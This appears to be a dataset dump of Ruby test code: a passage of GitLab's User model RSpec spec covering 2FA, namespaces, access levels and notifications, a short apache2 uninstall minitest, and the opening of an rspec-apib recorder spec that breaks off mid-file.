describe '#update_two_factor_requirement' do
let(:user) { create :user }
context 'with 2FA requirement on groups' do
let(:group1) { create :group, require_two_factor_authentication: true, two_factor_grace_period: 23 }
let(:group2) { create :group, require_two_factor_authentication: true, two_factor_grace_period: 32 }
before do
group1.add_user(user, GroupMember::OWNER)
group2.add_user(user, GroupMember::OWNER)
user.update_two_factor_requirement
end
it 'requires 2FA' do
expect(user.require_two_factor_authentication_from_group).to be true
end
it 'uses the shortest grace period' do
expect(user.two_factor_grace_period).to be 23
end
end
context 'with 2FA requirement from expanded groups' do
let!(:group1) { create :group, require_two_factor_authentication: true }
let!(:group1a) { create :group, parent: group1 }
before do
group1a.add_user(user, GroupMember::OWNER)
user.update_two_factor_requirement
end
it 'requires 2FA' do
expect(user.require_two_factor_authentication_from_group).to be true
end
end
context 'with 2FA requirement on nested child group' do
let!(:group1) { create :group, require_two_factor_authentication: false }
let!(:group1a) { create :group, require_two_factor_authentication: true, parent: group1 }
before do
group1.add_user(user, GroupMember::OWNER)
user.update_two_factor_requirement
end
it 'requires 2FA' do
expect(user.require_two_factor_authentication_from_group).to be true
end
end
context "with 2FA requirement from shared project's group" do
let!(:group1) { create :group, require_two_factor_authentication: true }
let!(:group2) { create :group }
let(:shared_project) { create(:project, namespace: group1) }
before do
shared_project.project_group_links.create!(
group: group2,
group_access: ProjectGroupLink.default_access
)
group2.add_user(user, GroupMember::OWNER)
end
it 'does not require 2FA' do
user.update_two_factor_requirement
expect(user.require_two_factor_authentication_from_group).to be false
end
end
context 'without 2FA requirement on groups' do
let(:group) { create :group }
before do
group.add_user(user, GroupMember::OWNER)
user.update_two_factor_requirement
end
it 'does not require 2FA' do
expect(user.require_two_factor_authentication_from_group).to be false
end
it 'falls back to the default grace period' do
expect(user.two_factor_grace_period).to be 48
end
end
end
describe '.active' do
before do
described_class.ghost
create(:user, name: 'user', state: 'active')
create(:user, name: 'user', state: 'blocked')
end
it 'only counts active and non internal users' do
expect(described_class.active.count).to eq(1)
end
end
describe 'preferred language' do
it 'is English by default' do
user = create(:user)
expect(user.preferred_language).to eq('en')
end
end
describe '#invalidate_issue_cache_counts' do
let(:user) { build_stubbed(:user) }
it 'invalidates cache for issue counter' do
cache_mock = double
expect(cache_mock).to receive(:delete).with(['users', user.id, 'assigned_open_issues_count'])
allow(Rails).to receive(:cache).and_return(cache_mock)
user.invalidate_issue_cache_counts
end
end
describe '#invalidate_merge_request_cache_counts' do
let(:user) { build_stubbed(:user) }
it 'invalidates cache for Merge Request counter' do
cache_mock = double
expect(cache_mock).to receive(:delete).with(['users', user.id, 'assigned_open_merge_requests_count'])
allow(Rails).to receive(:cache).and_return(cache_mock)
user.invalidate_merge_request_cache_counts
end
end
describe '#invalidate_personal_projects_count' do
let(:user) { build_stubbed(:user) }
it 'invalidates cache for personal projects counter' do
cache_mock = double
expect(cache_mock).to receive(:delete).with(['users', user.id, 'personal_projects_count'])
allow(Rails).to receive(:cache).and_return(cache_mock)
user.invalidate_personal_projects_count
end
end
describe '#allow_password_authentication_for_web?' do
context 'regular user' do
let(:user) { build(:user) }
it 'returns true when password authentication is enabled for the web interface' do
expect(user.allow_password_authentication_for_web?).to be_truthy
end
it 'returns false when password authentication is disabled for the web interface' do
stub_application_setting(password_authentication_enabled_for_web: false)
expect(user.allow_password_authentication_for_web?).to be_falsey
end
end
it 'returns false for ldap user' do
user = create(:omniauth_user, provider: 'ldapmain')
expect(user.allow_password_authentication_for_web?).to be_falsey
end
it 'returns false for ultraauth user' do
user = create(:omniauth_user, provider: 'ultraauth')
expect(user.allow_password_authentication_for_web?).to be_falsey
end
end
describe '#allow_password_authentication_for_git?' do
context 'regular user' do
let(:user) { build(:user) }
it 'returns true when password authentication is enabled for Git' do
expect(user.allow_password_authentication_for_git?).to be_truthy
end
it 'returns false when password authentication is disabled Git' do
stub_application_setting(password_authentication_enabled_for_git: false)
expect(user.allow_password_authentication_for_git?).to be_falsey
end
end
it 'returns false for ldap user' do
user = create(:omniauth_user, provider: 'ldapmain')
expect(user.allow_password_authentication_for_git?).to be_falsey
end
it 'returns false for ultraauth user' do
user = create(:omniauth_user, provider: 'ultraauth')
expect(user.allow_password_authentication_for_git?).to be_falsey
end
end
describe '#assigned_open_merge_requests_count' do
it 'returns number of open merge requests from non-archived projects' do
user = create(:user)
project = create(:project, :public)
archived_project = create(:project, :public, :archived)
create(:merge_request, source_project: project, author: user, assignees: [user])
create(:merge_request, :closed, source_project: project, author: user, assignees: [user])
create(:merge_request, source_project: archived_project, author: user, assignees: [user])
expect(user.assigned_open_merge_requests_count(force: true)).to eq 1
end
end
describe '#assigned_open_issues_count' do
it 'returns number of open issues from non-archived projects' do
user = create(:user)
project = create(:project, :public)
archived_project = create(:project, :public, :archived)
create(:issue, project: project, author: user, assignees: [user])
create(:issue, :closed, project: project, author: user, assignees: [user])
create(:issue, project: archived_project, author: user, assignees: [user])
expect(user.assigned_open_issues_count(force: true)).to eq 1
end
end
describe '#personal_projects_count' do
it 'returns the number of personal projects using a single query' do
user = build(:user)
projects = double(:projects, count: 1)
expect(user).to receive(:personal_projects).and_return(projects)
expect(user.personal_projects_count).to eq(1)
end
end
describe '#projects_limit_left' do
it 'returns the number of projects that can be created by the user' do
user = build(:user)
allow(user).to receive(:projects_limit).and_return(10)
allow(user).to receive(:personal_projects_count).and_return(5)
expect(user.projects_limit_left).to eq(5)
end
end
describe '#ensure_namespace_correct' do
context 'for a new user' do
let(:user) { build(:user) }
it 'creates the namespace' do
expect(user.namespace).to be_nil
user.save!
expect(user.namespace).not_to be_nil
end
end
context 'for an existing user' do
let(:username) { 'foo' }
let(:user) { create(:user, username: username) }
context 'when the user is updated' do
context 'when the username or name is changed' do
let(:new_username) { 'bar' }
it 'changes the namespace (just to compare to when username is not changed)' do
expect do
Timecop.freeze(1.second.from_now) do
user.update!(username: new_username)
end
end.to change { user.namespace.updated_at }
end
it 'updates the namespace path when the username was changed' do
user.update!(username: new_username)
expect(user.namespace.path).to eq(new_username)
end
it 'updates the namespace name if the name was changed' do
user.update!(name: 'New name')
expect(user.namespace.name).to eq('New name')
end
it 'updates nested routes for the namespace if the name was changed' do
project = create(:project, namespace: user.namespace)
user.update!(name: 'New name')
expect(project.route.reload.name).to include('New name')
end
context 'when there is a validation error (namespace name taken) while updating namespace' do
let!(:conflicting_namespace) { create(:group, path: new_username) }
it 'causes the user save to fail' do
expect(user.update(username: new_username)).to be_falsey
expect(user.namespace.errors.messages[:path].first).to eq(_('has already been taken'))
end
it 'adds the namespace errors to the user' do
user.update(username: new_username)
expect(user.errors.full_messages.first).to eq('Username has already been taken')
end
end
end
context 'when the username is not changed' do
it 'does not change the namespace' do
expect do
user.update!(email: '[email protected]')
end.not_to change { user.namespace.updated_at }
end
end
end
end
end
describe '#username_changed_hook' do
context 'for a new user' do
let(:user) { build(:user) }
it 'does not trigger system hook' do
expect(user).not_to receive(:system_hook_service)
user.save!
end
end
context 'for an existing user' do
let(:user) { create(:user, username: 'old-username') }
context 'when the username is changed' do
let(:new_username) { 'very-new-name' }
it 'triggers the rename system hook' do
system_hook_service = SystemHooksService.new
expect(system_hook_service).to receive(:execute_hooks_for).with(user, :rename)
expect(user).to receive(:system_hook_service).and_return(system_hook_service)
user.update!(username: new_username)
end
end
context 'when the username is not changed' do
it 'does not trigger system hook' do
expect(user).not_to receive(:system_hook_service)
user.update!(email: '[email protected]')
end
end
end
end
describe '#will_save_change_to_login?' do
let(:user) { create(:user, username: 'old-username', email: '[email protected]') }
let(:new_username) { 'new-name' }
let(:new_email) { '[email protected]' }
subject { user.will_save_change_to_login? }
context 'when the username is changed' do
before do
user.username = new_username
end
it { is_expected.to be true }
end
context 'when the email is changed' do
before do
user.email = new_email
end
it { is_expected.to be true }
end
context 'when both email and username are changed' do
before do
user.username = new_username
user.email = new_email
end
it { is_expected.to be true }
end
context 'when email and username aren\'t changed' do
before do
user.name = 'new_name'
end
it { is_expected.to be_falsy }
end
end
describe '#sync_attribute?' do
let(:user) { described_class.new }
context 'oauth user' do
it 'returns true if name can be synced' do
stub_omniauth_setting(sync_profile_attributes: %w(name location))
expect(user.sync_attribute?(:name)).to be_truthy
end
it 'returns true if email can be synced' do
stub_omniauth_setting(sync_profile_attributes: %w(name email))
expect(user.sync_attribute?(:email)).to be_truthy
end
it 'returns true if location can be synced' do
stub_omniauth_setting(sync_profile_attributes: %w(location email))
expect(user.sync_attribute?(:email)).to be_truthy
end
it 'returns false if name can not be synced' do
stub_omniauth_setting(sync_profile_attributes: %w(location email))
expect(user.sync_attribute?(:name)).to be_falsey
end
it 'returns false if email can not be synced' do
stub_omniauth_setting(sync_profile_attributes: %w(location name))
expect(user.sync_attribute?(:email)).to be_falsey
end
it 'returns false if location can not be synced' do
stub_omniauth_setting(sync_profile_attributes: %w(name email))
expect(user.sync_attribute?(:location)).to be_falsey
end
it 'returns true for all syncable attributes if all syncable attributes can be synced' do
stub_omniauth_setting(sync_profile_attributes: true)
expect(user.sync_attribute?(:name)).to be_truthy
expect(user.sync_attribute?(:email)).to be_truthy
expect(user.sync_attribute?(:location)).to be_truthy
end
it 'returns false for all syncable attributes but email if no syncable attributes are declared' do
expect(user.sync_attribute?(:name)).to be_falsey
expect(user.sync_attribute?(:email)).to be_truthy
expect(user.sync_attribute?(:location)).to be_falsey
end
end
context 'ldap user' do
it 'returns true for email if ldap user' do
allow(user).to receive(:ldap_user?).and_return(true)
expect(user.sync_attribute?(:name)).to be_falsey
expect(user.sync_attribute?(:email)).to be_truthy
expect(user.sync_attribute?(:location)).to be_falsey
end
it 'returns true for email and location if ldap user and location declared as syncable' do
allow(user).to receive(:ldap_user?).and_return(true)
stub_omniauth_setting(sync_profile_attributes: %w(location))
expect(user.sync_attribute?(:name)).to be_falsey
expect(user.sync_attribute?(:email)).to be_truthy
expect(user.sync_attribute?(:location)).to be_truthy
end
end
end
describe '#confirm_deletion_with_password?' do
where(
password_automatically_set: [true, false],
ldap_user: [true, false],
password_authentication_disabled: [true, false]
)
with_them do
let!(:user) { create(:user, password_automatically_set: password_automatically_set) }
let!(:identity) { create(:identity, user: user) if ldap_user }
# Only confirm deletion with password if all inputs are false
let(:expected) { !(password_automatically_set || ldap_user || password_authentication_disabled) }
before do
stub_application_setting(password_authentication_enabled_for_web: !password_authentication_disabled)
stub_application_setting(password_authentication_enabled_for_git: !password_authentication_disabled)
end
it 'returns false unless all inputs are true' do
expect(user.confirm_deletion_with_password?).to eq(expected)
end
end
end
describe '#delete_async' do
let(:user) { create(:user) }
let(:deleted_by) { create(:user) }
it 'blocks the user then schedules them for deletion if a hard delete is specified' do
expect(DeleteUserWorker).to receive(:perform_async).with(deleted_by.id, user.id, hard_delete: true)
user.delete_async(deleted_by: deleted_by, params: { hard_delete: true })
expect(user).to be_blocked
end
it 'schedules user for deletion without blocking them' do
expect(DeleteUserWorker).to receive(:perform_async).with(deleted_by.id, user.id, {})
user.delete_async(deleted_by: deleted_by)
expect(user).not_to be_blocked
end
end
describe '#max_member_access_for_project_ids' do
shared_examples 'max member access for projects' do
let(:user) { create(:user) }
let(:group) { create(:group) }
let(:owner_project) { create(:project, group: group) }
let(:maintainer_project) { create(:project) }
let(:reporter_project) { create(:project) }
let(:developer_project) { create(:project) }
let(:guest_project) { create(:project) }
let(:no_access_project) { create(:project) }
let(:projects) do
[owner_project, maintainer_project, reporter_project, developer_project, guest_project, no_access_project].map(&:id)
end
let(:expected) do
{
owner_project.id => Gitlab::Access::OWNER,
maintainer_project.id => Gitlab::Access::MAINTAINER,
reporter_project.id => Gitlab::Access::REPORTER,
developer_project.id => Gitlab::Access::DEVELOPER,
guest_project.id => Gitlab::Access::GUEST,
no_access_project.id => Gitlab::Access::NO_ACCESS
}
end
before do
create(:group_member, user: user, group: group)
maintainer_project.add_maintainer(user)
reporter_project.add_reporter(user)
developer_project.add_developer(user)
guest_project.add_guest(user)
end
it 'returns correct roles for different projects' do
expect(user.max_member_access_for_project_ids(projects)).to eq(expected)
end
end
context 'with RequestStore enabled', :request_store do
include_examples 'max member access for projects'
def access_levels(projects)
user.max_member_access_for_project_ids(projects)
end
it 'does not perform extra queries when asked for projects who have already been found' do
access_levels(projects)
expect { access_levels(projects) }.not_to exceed_query_limit(0)
expect(access_levels(projects)).to eq(expected)
end
it 'only requests the extra projects when uncached projects are passed' do
second_maintainer_project = create(:project)
second_developer_project = create(:project)
second_maintainer_project.add_maintainer(user)
second_developer_project.add_developer(user)
all_projects = projects + [second_maintainer_project.id, second_developer_project.id]
expected_all = expected.merge(second_maintainer_project.id => Gitlab::Access::MAINTAINER,
second_developer_project.id => Gitlab::Access::DEVELOPER)
access_levels(projects)
queries = ActiveRecord::QueryRecorder.new { access_levels(all_projects) }
expect(queries.count).to eq(1)
expect(queries.log_message).to match(/\W(#{second_maintainer_project.id}, #{second_developer_project.id})\W/)
expect(access_levels(all_projects)).to eq(expected_all)
end
end
context 'with RequestStore disabled' do
include_examples 'max member access for projects'
end
end
describe '#max_member_access_for_group_ids' do
shared_examples 'max member access for groups' do
let(:user) { create(:user) }
let(:owner_group) { create(:group) }
let(:maintainer_group) { create(:group) }
let(:reporter_group) { create(:group) }
let(:developer_group) { create(:group) }
let(:guest_group) { create(:group) }
let(:no_access_group) { create(:group) }
let(:groups) do
[owner_group, maintainer_group, reporter_group, developer_group, guest_group, no_access_group].map(&:id)
end
let(:expected) do
{
owner_group.id => Gitlab::Access::OWNER,
maintainer_group.id => Gitlab::Access::MAINTAINER,
reporter_group.id => Gitlab::Access::REPORTER,
developer_group.id => Gitlab::Access::DEVELOPER,
guest_group.id => Gitlab::Access::GUEST,
no_access_group.id => Gitlab::Access::NO_ACCESS
}
end
before do
owner_group.add_owner(user)
maintainer_group.add_maintainer(user)
reporter_group.add_reporter(user)
developer_group.add_developer(user)
guest_group.add_guest(user)
end
it 'returns correct roles for different groups' do
expect(user.max_member_access_for_group_ids(groups)).to eq(expected)
end
end
context 'with RequestStore enabled', :request_store do
include_examples 'max member access for groups'
def access_levels(groups)
user.max_member_access_for_group_ids(groups)
end
it 'does not perform extra queries when asked for groups who have already been found' do
access_levels(groups)
expect { access_levels(groups) }.not_to exceed_query_limit(0)
expect(access_levels(groups)).to eq(expected)
end
it 'only requests the extra groups when uncached groups are passed' do
second_maintainer_group = create(:group)
second_developer_group = create(:group)
second_maintainer_group.add_maintainer(user)
second_developer_group.add_developer(user)
all_groups = groups + [second_maintainer_group.id, second_developer_group.id]
expected_all = expected.merge(second_maintainer_group.id => Gitlab::Access::MAINTAINER,
second_developer_group.id => Gitlab::Access::DEVELOPER)
access_levels(groups)
queries = ActiveRecord::QueryRecorder.new { access_levels(all_groups) }
expect(queries.count).to eq(1)
expect(queries.log_message).to match(/\W(#{second_maintainer_group.id}, #{second_developer_group.id})\W/)
expect(access_levels(all_groups)).to eq(expected_all)
end
end
context 'with RequestStore disabled' do
include_examples 'max member access for groups'
end
end
context 'changing a username' do
let(:user) { create(:user, username: 'foo') }
it 'creates a redirect route' do
expect { user.update!(username: 'bar') }
.to change { RedirectRoute.where(path: 'foo').count }.by(1)
end
it 'deletes the redirect when a user with the old username was created' do
user.update!(username: 'bar')
expect { create(:user, username: 'foo') }
.to change { RedirectRoute.where(path: 'foo').count }.by(-1)
end
end
describe '#required_terms_not_accepted?' do
let(:user) { build(:user) }
subject { user.required_terms_not_accepted? }
context "when terms are not enforced" do
it { is_expected.to be_falsy }
end
context "when terms are enforced and accepted by the user" do
before do
enforce_terms
accept_terms(user)
end
it { is_expected.to be_falsy }
end
context "when terms are enforced but the user has not accepted" do
before do
enforce_terms
end
it { is_expected.to be_truthy }
end
end
describe '#increment_failed_attempts!' do
subject(:user) { create(:user, failed_attempts: 0) }
it 'logs failed sign-in attempts' do
expect { user.increment_failed_attempts! }.to change(user, :failed_attempts).from(0).to(1)
end
it 'does not log failed sign-in attempts when in a GitLab read-only instance' do
allow(Gitlab::Database).to receive(:read_only?) { true }
expect { user.increment_failed_attempts! }.not_to change(user, :failed_attempts)
end
end
describe '#requires_usage_stats_consent?' do
let(:user) { create(:user, :admin, created_at: 8.days.ago) }
before do
allow(user).to receive(:has_current_license?).and_return false
end
context 'in single-user environment' do
it 'requires user consent after one week' do
create(:user, :ghost)
expect(user.requires_usage_stats_consent?).to be true
end
it 'requires user consent after one week if there is another ghost user' do
expect(user.requires_usage_stats_consent?).to be true
end
it 'does not require consent in the first week' do
user.created_at = 6.days.ago
expect(user.requires_usage_stats_consent?).to be false
end
it 'does not require consent if usage stats were set by this user' do
create(:application_setting, usage_stats_set_by_user_id: user.id)
expect(user.requires_usage_stats_consent?).to be false
end
end
context 'in multi-user environment' do
before do
create(:user)
end
it 'does not require consent' do
expect(user.requires_usage_stats_consent?).to be false
end
end
end
context 'with uploads' do
it_behaves_like 'model with uploads', false do
let(:model_object) { create(:user, :with_avatar) }
let(:upload_attribute) { :avatar }
let(:uploader_class) { AttachmentUploader }
end
end
describe '.union_with_user' do
context 'when no user ID is provided' do
it 'returns the input relation' do
user = create(:user)
expect(described_class.union_with_user).to eq([user])
end
end
context 'when a user ID is provided' do
it 'includes the user object in the returned relation' do
user1 = create(:user)
user2 = create(:user)
users = described_class.where(id: user1.id).union_with_user(user2.id)
expect(users).to include(user1)
expect(users).to include(user2)
end
it 'does not re-apply any WHERE conditions on the outer query' do
relation = described_class.where(id: 1).union_with_user(2)
expect(relation.arel.where_sql).to be_nil
end
end
end
describe '.optionally_search' do
context 'using nil as the argument' do
it 'returns the current relation' do
user = create(:user)
expect(described_class.optionally_search).to eq([user])
end
end
context 'using an empty String as the argument' do
it 'returns the current relation' do
user = create(:user)
expect(described_class.optionally_search('')).to eq([user])
end
end
context 'using a non-empty String' do
it 'returns users matching the search query' do
user1 = create(:user)
create(:user)
expect(described_class.optionally_search(user1.name)).to eq([user1])
end
end
end
describe '.where_not_in' do
context 'without an argument' do
it 'returns the current relation' do
user = create(:user)
expect(described_class.where_not_in).to eq([user])
end
end
context 'using a list of user IDs' do
it 'excludes the users from the returned relation' do
user1 = create(:user)
user2 = create(:user)
expect(described_class.where_not_in([user2.id])).to eq([user1])
end
end
end
describe '.reorder_by_name' do
it 'reorders the input relation' do
user1 = create(:user, name: 'A')
user2 = create(:user, name: 'B')
expect(described_class.reorder_by_name).to eq([user1, user2])
end
end
describe '#notification_settings_for' do
let(:user) { create(:user) }
let(:source) { nil }
subject { user.notification_settings_for(source) }
context 'when source is nil' do
it 'returns a blank global notification settings object' do
expect(subject.source).to eq(nil)
expect(subject.notification_email).to eq(nil)
expect(subject.level).to eq('global')
end
end
context 'when source is a Group' do
let(:group) { create(:group) }
subject { user.notification_settings_for(group, inherit: true) }
context 'when group has no existing notification settings' do
context 'when group has no ancestors' do
it 'will be a default Global notification setting' do
expect(subject.notification_email).to eq(nil)
expect(subject.level).to eq('global')
end
end
context 'when group has ancestors' do
context 'when an ancestor has a level other than Global' do
let(:ancestor) { create(:group) }
let(:group) { create(:group, parent: ancestor) }
let(:email) { create(:email, :confirmed, email: '[email protected]', user: user) }
before do
create(:notification_setting, user: user, source: ancestor, level: 'participating', notification_email: email.email)
end
it 'has the same level set' do
expect(subject.level).to eq('participating')
end
it 'has the same email set' do
expect(subject.notification_email).to eq('[email protected]')
end
context 'when inherit is false' do
subject { user.notification_settings_for(group) }
it 'does not inherit settings' do
expect(subject.notification_email).to eq(nil)
expect(subject.level).to eq('global')
end
end
end
context 'when an ancestor has a Global level but has an email set' do
let(:grand_ancestor) { create(:group) }
let(:ancestor) { create(:group, parent: grand_ancestor) }
let(:group) { create(:group, parent: ancestor) }
let(:ancestor_email) { create(:email, :confirmed, email: '[email protected]', user: user) }
let(:grand_email) { create(:email, :confirmed, email: '[email protected]', user: user) }
before do
create(:notification_setting, user: user, source: grand_ancestor, level: 'participating', notification_email: grand_email.email)
create(:notification_setting, user: user, source: ancestor, level: 'global', notification_email: ancestor_email.email)
end
it 'has the same email set' do
expect(subject.level).to eq('global')
expect(subject.notification_email).to eq('[email protected]')
end
end
end
end
end
end
describe '#notification_email_for' do
let(:user) { create(:user) }
let(:group) { create(:group) }
subject { user.notification_email_for(group) }
context 'when group is nil' do
let(:group) { nil }
it 'returns global notification email' do
is_expected.to eq(user.notification_email)
end
end
context 'when group has no notification email set' do
it 'returns global notification email' do
create(:notification_setting, user: user, source: group, notification_email: '')
is_expected.to eq(user.notification_email)
end
end
context 'when group has notification email set' do
it 'returns group notification email' do
group_notification_email = '[email protected]'
create(:email, :confirmed, user: user, email: group_notification_email)
create(:notification_setting, user: user, source: group, notification_email: group_notification_email)
is_expected.to eq(group_notification_email)
end
end
end
describe '#password_expired?' do
let(:user) { build(:user, password_expires_at: password_expires_at) }
subject { user.password_expired? }
context 'when password_expires_at is not set' do
let(:password_expires_at) {}
it 'returns false' do
is_expected.to be_falsey
end
end
context 'when password_expires_at is in the past' do
let(:password_expires_at) { 1.minute.ago }
it 'returns true' do
is_expected.to be_truthy
end
end
context 'when password_expires_at is in the future' do
let(:password_expires_at) { 1.minute.from_now }
it 'returns false' do
is_expected.to be_falsey
end
end
end
describe '#read_only_attribute?' do
context 'when synced attributes metadata is present' do
it 'delegates to synced_attributes_metadata' do
subject.build_user_synced_attributes_metadata
expect(subject.build_user_synced_attributes_metadata)
.to receive(:read_only?).with(:email).and_return('return-value')
expect(subject.read_only_attribute?(:email)).to eq('return-value')
end
end
context 'when synced attributes metadata is not present' do
it 'is false for any attribute' do
expect(subject.read_only_attribute?(:email)).to be_falsey
end
end
end
describe '.active_without_ghosts' do
let_it_be(:user1) { create(:user, :external) }
let_it_be(:user2) { create(:user, state: 'blocked') }
let_it_be(:user3) { create(:user, :ghost) }
let_it_be(:user4) { create(:user, user_type: :support_bot) }
let_it_be(:user5) { create(:user, state: 'blocked', user_type: :support_bot) }
it 'returns all active users including active bots but ghost users' do
expect(described_class.active_without_ghosts).to match_array([user1, user4])
end
end
describe '#dismissed_callout?' do
subject(:user) { create(:user) }
let(:feature_name) { UserCallout.feature_names.each_key.first }
context 'when no callout dismissal record exists' do
it 'returns false when no ignore_dismissal_earlier_than provided' do
expect(user.dismissed_callout?(feature_name: feature_name)).to eq false
end
it 'returns false when ignore_dismissal_earlier_than provided' do
expect(user.dismissed_callout?(feature_name: feature_name, ignore_dismissal_earlier_than: 3.months.ago)).to eq false
end
end
context 'when dismissed callout exists' do
before do
create(:user_callout, user: user, feature_name: feature_name, dismissed_at: 4.months.ago)
end
it 'returns true when no ignore_dismissal_earlier_than provided' do
expect(user.dismissed_callout?(feature_name: feature_name)).to eq true
end
it 'returns true when ignore_dismissal_earlier_than is earlier than dismissed_at' do
expect(user.dismissed_callout?(feature_name: feature_name, ignore_dismissal_earlier_than: 6.months.ago)).to eq true
end
it 'returns false when ignore_dismissal_earlier_than is later than dismissed_at' do
expect(user.dismissed_callout?(feature_name: feature_name, ignore_dismissal_earlier_than: 3.months.ago)).to eq false
end
end
end
describe '#hook_attrs' do
it 'includes name, username, avatar_url, and email' do
user = create(:user)
user_attributes = {
name: user.name,
username: user.username,
avatar_url: user.avatar_url(only_path: false),
email: user.email
}
expect(user.hook_attrs).to eq(user_attributes)
end
end
describe 'user detail' do
context 'when user is initialized' do
let(:user) { build(:user) }
it { expect(user.user_detail).to be_present }
it { expect(user.user_detail).not_to be_persisted }
end
context 'when user detail exists' do
let(:user) { create(:user, job_title: 'Engineer') }
it { expect(user.user_detail).to be_persisted }
end
end
describe '#current_highest_access_level' do
let_it_be(:user) { create(:user) }
context 'when no memberships exist' do
it 'returns nil' do
expect(user.current_highest_access_level).to be_nil
end
end
context 'when memberships exist' do
it 'returns the highest access level for non requested memberships' do
create(:group_member, :reporter, user_id: user.id)
create(:project_member, :guest, user_id: user.id)
create(:project_member, :maintainer, user_id: user.id, requested_at: Time.current)
expect(user.current_highest_access_level).to eq(Gitlab::Access::REPORTER)
end
end
end
context 'when after_commit :update_highest_role' do
describe 'create user' do
subject { create(:user) }
it 'schedules a job in the future', :aggregate_failures, :clean_gitlab_redis_shared_state do
allow_next_instance_of(Gitlab::ExclusiveLease) do |instance|
allow(instance).to receive(:try_obtain).and_return('uuid')
end
expect(UpdateHighestRoleWorker).to receive(:perform_in).and_call_original
expect { subject }.to change(UpdateHighestRoleWorker.jobs, :size).by(1)
end
end
context 'when user already exists' do
let!(:user) { create(:user) }
let(:user_id) { user.id }
describe 'update user' do
using RSpec::Parameterized::TableSyntax
where(:attributes) do
[
{ state: 'blocked' },
{ user_type: :ghost },
{ user_type: :alert_bot }
]
end
with_them do
context 'when state was changed' do
subject { user.update(attributes) }
include_examples 'update highest role with exclusive lease'
end
end
context 'when state was not changed' do
subject { user.update(email: '[email protected]') }
include_examples 'does not update the highest role'
end
end
describe 'destroy user' do
subject { user.destroy }
include_examples 'does not update the highest role'
end
end
end
describe '#active_for_authentication?' do
subject { user.active_for_authentication? }
let(:user) { create(:user) }
context 'when user is blocked' do
before do
user.block
end
it { is_expected.to be false }
end
context 'when user is a ghost user' do
before do
user.update(user_type: :ghost)
end
it { is_expected.to be false }
end
context 'based on user type' do
using RSpec::Parameterized::TableSyntax
where(:user_type, :expected_result) do
'human' | true
'alert_bot' | false
end
with_them do
before do
user.update(user_type: user_type)
end
it { is_expected.to be expected_result }
end
end
end
describe '#inactive_message' do
subject { user.inactive_message }
let(:user) { create(:user) }
context 'when user is blocked' do
before do
user.block
end
it { is_expected.to eq User::BLOCKED_MESSAGE }
end
context 'when user is an internal user' do
before do
user.update(user_type: :ghost)
end
it { is_expected.to be User::LOGIN_FORBIDDEN }
end
context 'when user is locked' do
before do
user.lock_access!
end
it { is_expected.to be :locked }
end
end
describe '#password_required?' do
let_it_be(:user) { create(:user) }
shared_examples 'does not require password to be present' do
it { expect(user).not_to validate_presence_of(:password) }
it { expect(user).not_to validate_presence_of(:password_confirmation) }
end
context 'when user is an internal user' do
before do
user.update(user_type: 'alert_bot')
end
it_behaves_like 'does not require password to be present'
end
context 'when user is a project bot user' do
before do
user.update(user_type: 'project_bot')
end
it_behaves_like 'does not require password to be present'
end
end
describe '#migration_bot' do
it 'creates the user if it does not exist' do
expect do
described_class.migration_bot
end.to change { User.where(user_type: :migration_bot).count }.by(1)
end
it 'does not create a new user if it already exists' do
described_class.migration_bot
expect do
described_class.migration_bot
end.not_to change { User.count }
end
end
end
| 31.881601 | 430 | 0.657931 |
1cbb0c8e4b1ede90c589332ca5d7cf09c9d2bc87 | 716 | require 'minitest/spec'
describe_recipe 'apache2::uninstall' do
include MiniTest::Chef::Resources
include MiniTest::Chef::Assertions
it 'should stop apache2' do
case node[:platform_family]
when 'debian'
service('apache2').wont_be_running
when 'rhel'
service('httpd').wont_be_running
else
# Fail test if we don't have a supported OS.
assert_equal(3, nil)
end
end
it 'should remove the apache2 package' do
case node[:platform_family]
when 'debian'
package('apache2').wont_be_installed
when 'rhel'
package('httpd').wont_be_installed
else
# Fail test if we don't have a supported OS.
assert_equal(3, nil)
end
end
end
| 23.096774 | 50 | 0.670391 |
089f6f49daabb91cad9474053fa0ce9e9024d325 | 7,466 | require 'spec_helper'
describe RSpec::Apib::Recorder do
def stub_request(env = {})
ip_app = ActionDispatch::RemoteIp.new(Proc.new {})
ip_app.call(env)
ActionDispatch::Request.new(env)
end
let(:example) do
double(
metadata: {
example_group: {}
},
description: 'foo example'
)
end
let(:response) do
double(
status: 200,
content_type: 'application/json',
body: '{}',
headers: {}
)
end
let(:routes) { ActionDispatch::Routing::RouteSet.new }
let(:mapper) { ActionDispatch::Routing::Mapper.new routes }
let(:doc) { {} }
let(:request) do
request = stub_request(
"SCRIPT_NAME" => "",
"PATH_INFO" => "/foo/5",
"REQUEST_METHOD" => "GET",
"HTTP_ORIGIN" => "foobar",
"rack.input" => StringIO.new('{}')
)
end
subject { described_class.new(example, request, response, routes, doc) }
before :each do
routes.draw do
get '/foo/:id' => 'foo#bar'
end
end
it { should respond_to :run }
describe '#run' do
before :each do
allow(subject).to receive(:document_request)
allow(subject).to receive(:document_response)
end
context 'when request is nil' do
let(:request) { nil }
let(:response) { true }
it 'is not calling #document_request' do
expect(subject).to_not receive(:document_request)
subject.run
end
it 'is not calling #document_response' do
expect(subject).to_not receive(:document_response)
subject.run
end
end
context 'when response is nil' do
let(:request) { true }
let(:response) { nil }
it 'is not calling #document_request' do
expect(subject).to_not receive(:document_request)
subject.run
end
it 'is not calling #document_response' do
expect(subject).to_not receive(:document_response)
subject.run
end
end
it 'calls #document_request' do
expect(subject).to receive(:document_request)
subject.run
end
it 'calls #document_response' do
expect(subject).to receive(:document_response)
subject.run
end
end
pending '#initialize'
pending '#request_header_blacklist'
pending '#request_param_blacklist'
pending '#route'
pending '#example_group'
describe '#path' do
it 'highlights required parts' do
mapper.get "/foo/:id", to: "foo#bar", as: "baz"
expect(subject.send(:path)).to eql '/foo/{id}(.{format})'
end
it 'highlights optional parts' do
mapper.get "/foo/(:id)", to: "foo#bar", as: "baz"
expect(subject.send(:path)).to eql '/foo(/{id})(.{format})'
end
end
pending '#group'
pending '#resource_type'
pending '#resource_name'
pending '#action'
pending '#document_request'
pending '#document_request_header'
describe '#document_request_header' do
it 'records headers' do
action = subject.tap { |s| s.run }.send(:action)
expect(action[:request][:headers]['origin']).to eql 'foobar'
end
it 'is not recording empty headers' do
request = stub_request(
"SCRIPT_NAME" => "",
"PATH_INFO" => "/foo/5",
"REQUEST_METHOD" => "GET",
"HTTP_ORIGIN" => "",
"rack.input" => StringIO.new('{}')
)
subject = described_class.new(example, request, response, routes, doc)
action = subject.tap { |s| s.run }.send(:action)
expect(action[:request][:headers]).to_not have_key 'origin'
end
end
describe '#document_extended_description' do
context 'only response description is included' do
# --- apib:response
# This is a comment used as description.
# ---
